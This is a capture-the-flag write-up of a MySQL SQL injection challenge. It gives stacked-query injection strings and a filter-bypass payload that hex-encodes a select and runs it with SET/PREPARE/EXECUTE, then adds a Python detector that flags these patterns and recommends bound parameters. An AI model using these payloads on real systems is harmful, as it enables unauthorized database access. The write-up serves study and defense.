Open the challenge environment.
The prompt suggests this is a SQL injection challenge.
Check the database names and the tables:
1';show databases;#
1';show tables;#
Check the fields of the table (1';desc `1919810931114514`;#)
The keyword flag shows up in the output, so try to query it.
The injection attempt shows that the input is filtered.
The following code was found during the injection
The bypass therefore combines set and prepare, with the select statement hex-encoded to get past the check on select.
Hex-encode the statement (select * from `1919810931114514`).
The payload is constructed as follows:
1';SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
The flag is returned successfully.
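
Why a keyword filter misses this payload, seen from the defender's side, as an added example that is not code from the original write-up: the check decodes MySQL hex literals before scanning and also flags stacked statements and prepare/execute. The blocklist and all function names are assumptions, since the challenge's filter is not reproduced on the page.

```python
import re

# Assumed blocklist for illustration; the challenge's real filter is not shown on the page.
BLOCKED = re.compile(r"\b(select|update|delete|drop|insert)\b", re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.I)
DYNAMIC_SQL = re.compile(r"\b(prepare|execute)\b", re.I)


def naive_filter_blocks(value: str) -> bool:
    """Keyword-only check on the raw parameter, as a blocklist filter would do."""
    return bool(BLOCKED.search(value))


def decode_hex_literals(value: str) -> list[str]:
    """Return the text hidden in every MySQL 0x... literal in the parameter."""
    return [bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
            for m in HEX_LITERAL.finditer(value)]


def inspect(value: str) -> list[str]:
    """Return the reasons a parameter value should be flagged (empty if none)."""
    findings = []
    if naive_filter_blocks(value):
        findings.append("blocked keyword in raw input")
    # A statement separator followed by more text means stacked queries.
    if re.search(r";\s*\S", value):
        findings.append("stacked statement")
    if DYNAMIC_SQL.search(value):
        findings.append("dynamic SQL (prepare/execute)")
    # Re-run the keyword check on what the server would see after decoding.
    for text in decode_hex_literals(value):
        if BLOCKED.search(text):
            findings.append(f"blocked keyword inside hex literal: {text}")
    return findings


# PAYLOAD is the string quoted in the write-up above; BENIGN is a constructed value.
PAYLOAD = ("1';SeT@a=0x73656C656374202A2066726F6D2060313931393831303933"
           "3131313435313460;prepare execsql from @a;execute execsql;#")
BENIGN = "1"

if __name__ == "__main__":
    print("naive filter blocks payload:", naive_filter_blocks(PAYLOAD))
    for reason in inspect(PAYLOAD):
        print("flag:", reason)
```

Detection of this kind is a secondary control: binding the parameter in a prepared statement and using a database call that executes only a single statement removes the stacked-query path the payload depends on.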